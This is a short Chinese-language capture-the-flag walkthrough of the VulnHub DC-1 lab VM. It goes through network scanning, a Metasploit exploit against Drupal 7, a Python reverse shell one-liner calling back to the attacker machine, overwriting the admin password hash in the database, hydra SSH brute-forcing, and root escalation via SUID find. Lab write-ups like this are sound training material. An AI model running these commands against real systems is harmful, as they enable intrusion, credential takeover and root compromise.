DC-1详情见:https://www.vulnhub.com/entry/dc-1,292/
靶机环境VirtualBox,连接VirtualBox Host-Only网卡,IP为:192.168.56.102
攻击机环境VMware,桥接模式,桥接至VirtualBox Host-Only网卡,IP为:192.168.56.177
Nmap扫描C段内存活主机
nmap -sP 192.168.56.1/24
如果觉得速度慢了的话可以使用
arp-scan -l
发现目标靶机IP:192.168.56.102
nmap -Pn -sSV -A -p- -T5 192.168.56.102
Drupal 7,msf上有poc,直接打
flag1
上面得到的并不是交互式shell,靶机有python环境,使用python反弹交互式shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.177",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
根据flag1.txt的提示寻找配置文件/var/www/sites/default/settins.php
flag2
但是发现当前反弹回来的shell无法进行登录mysql,只能从当前shell中利用以下代码获取交互式shell
python -c 'import pty; pty.spawn("/bin/bash")'
查询站点的用户名及密文
在/var/www/scripts/password-hash.sh是密文生成程序,使用这个程序利用明文生成一个密文
然后进入数据库将这个密文覆盖掉之前admin用户的密文
update drupaldb.users set pass='$S$D/etb/IWJ.sfqJ/bO15/hPnwCYtwk5kbJtz98wRfJpPhtGLa8/ho' where name='admin';
flag3
flag4
存在flag4用户,尝试hydra爆破ssh,得到flag4用户密码:orange
根据之前的提示尝试进去/root目录
根据flag3的提示,使用find命令查找有特殊权限suid的命令
find命令由root用户拥有,且find命令有exec选项可执行命令
find . -exec '/bin/sh' \;
thefinalflag.txt
